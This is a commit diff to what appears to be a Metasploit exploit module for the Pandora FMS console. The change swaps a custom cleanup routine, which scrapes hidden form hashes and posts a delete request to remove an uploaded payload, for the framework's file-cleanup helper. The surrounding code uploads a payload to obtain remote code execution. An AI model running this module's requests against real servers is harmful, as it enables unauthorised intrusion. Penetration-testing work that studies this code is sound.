Use Msf::Exploit::FileDropper
jvazquez-r7
parent
7fbd5b63b1
commit
4bbadc44d6
|
|
@ -281,6 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?("Upload correct")
|
||||
register_file_for_cleanup(@payload_name)
|
||||
print_status("#{peer} - Successfully uploaded payload")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
|
|
@ -310,80 +311,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::Unknown, "#{peer} - Unable to perform remote code execution!")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def cleanup
|
||||
super
|
||||
return if @rce_failed
|
||||
|
||||
print_status("#{peer} - Cleaning script remnants")
|
||||
|
||||
# Extract hash and hash2 from response
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /(?<=#{@payload_name}<)(.*)(?=<\/tr>)/m
|
||||
form = $1
|
||||
|
||||
# Extract hash
|
||||
if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash from response!")
|
||||
print_error("#{peer} - Upload will fail!")
|
||||
return false
|
||||
end
|
||||
|
||||
# Extract hash2
|
||||
if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash2 = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash2 from response!")
|
||||
print_error("#{peer} - Upload will fail!")
|
||||
return false
|
||||
end
|
||||
|
||||
# Extract real_directory
|
||||
if form =~ /(?<=filename" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
filepath = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract real_directory from response! Falling back to default.")
|
||||
filepath = '/var/www/html/pandora_console/images/'
|
||||
end
|
||||
|
||||
|
||||
else
|
||||
print_error("#{peer} - Could not identify file manager form!")
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, "index.php"),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
},
|
||||
'vars_post' => {
|
||||
'filename' => filepath,
|
||||
'hash' => hash,
|
||||
'hash2' => hash2,
|
||||
'directory' => 'images',
|
||||
'delete_file' => 1
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?('Success')
|
||||
print_status("#{peer} - Script removed successfully")
|
||||
else
|
||||
print_warning("#{peer} - Failed to remove #{@payload_name}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue